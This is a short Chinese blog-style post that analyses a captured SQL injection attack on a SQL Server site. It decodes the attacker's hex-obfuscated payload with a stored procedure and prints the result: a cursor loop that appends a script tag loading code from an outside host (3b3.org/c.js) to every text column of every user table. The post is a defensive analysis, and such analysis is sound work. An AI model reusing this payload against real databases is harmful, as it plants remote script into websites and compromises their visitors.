前面,通过监测,看到了攻击的方法,得到了攻击的内容:
为了得到攻击的内容,新建一个存储过程,(声明一下,我对SQL SERVER 不熟悉,请不要笑话):
set ANSI_NULLS ON
set QUOTED_IDENTIFIER ON
go
-- =============================================
-- Author: <Author,,Name>
-- Create date: <Create Date,,>
-- Description: <Description,,>
-- =============================================
ALTER PROCEDURE [dbo].[test]
-- Add the parameters for the stored procedure here
AS
BEGIN
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.
SET NOCOUNT ON;
-- Insert statements for procedure her
DeCLaRE @S NvArCHaR(4000);
SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068
0061007200280032003500350029002C004000430020005600610072006300680061007200280032
0035003500290020004400650063006C0061007200650020005400610062006C0065005F004300
7500720073006F007200200043007500720073006F007200200046006F0072002000530065006C0
0650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072
006F006D0020005300790073006F0062006A006500630074007300200041002C00530079007300
63006F006C0075006D006E00730020004200200057006800650072006500200041002E004900640
03D0042002E0049006400200041006E006400200041002E00580074007900700065003D0027007
5002700200041006E0064002000280042002E00580074007900700065003D003900390020004F0
07200200042002E00580074007900700065003D003300350020004F007200200042002E0058007
4007900700065003D0032003300310020004F007200200042002E00580074007900700065003D0
0310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073
006F00720020004600650074006300680020004E006500780074002000460072006F006D0020002
0005400610062006C0065005F0043007500720073006F007200200049006E0074006F0020004000
54002C004000430020005700680069006C006500280040004000460065007400630068005F0053
00740061007400750073003D0030002900200042006500670069006E00200045007800650063002
800270075007000640061007400650020005B0027002B00400054002B0027005D0020005300650
0740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E0
07600650072007400280056006100720063006800610072002800380030003000300029002C005B
0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F00
63002E006A0073003E003C002F007300630072006900700074003E002700270027002900460065
0074006300680020004E006500780074002000460072006F006D00200020005400610062006C0
065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020
0045006E006400200043006C006F007300650020005400610062006C0065005F004300750072007
3006F00720020004400650061006C006C006F00630061007400650020005400610062006C006500
5F0043007500720073006F007200 aS NvArChAR(4000));
print @S;
END
执行过程,得到攻击内容:
Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor
大家可以看到以上的内容,在列中写入 <script src=http://3b3.org/c.js></script>
防止的方法,有一个最简单的办法,有时间再写!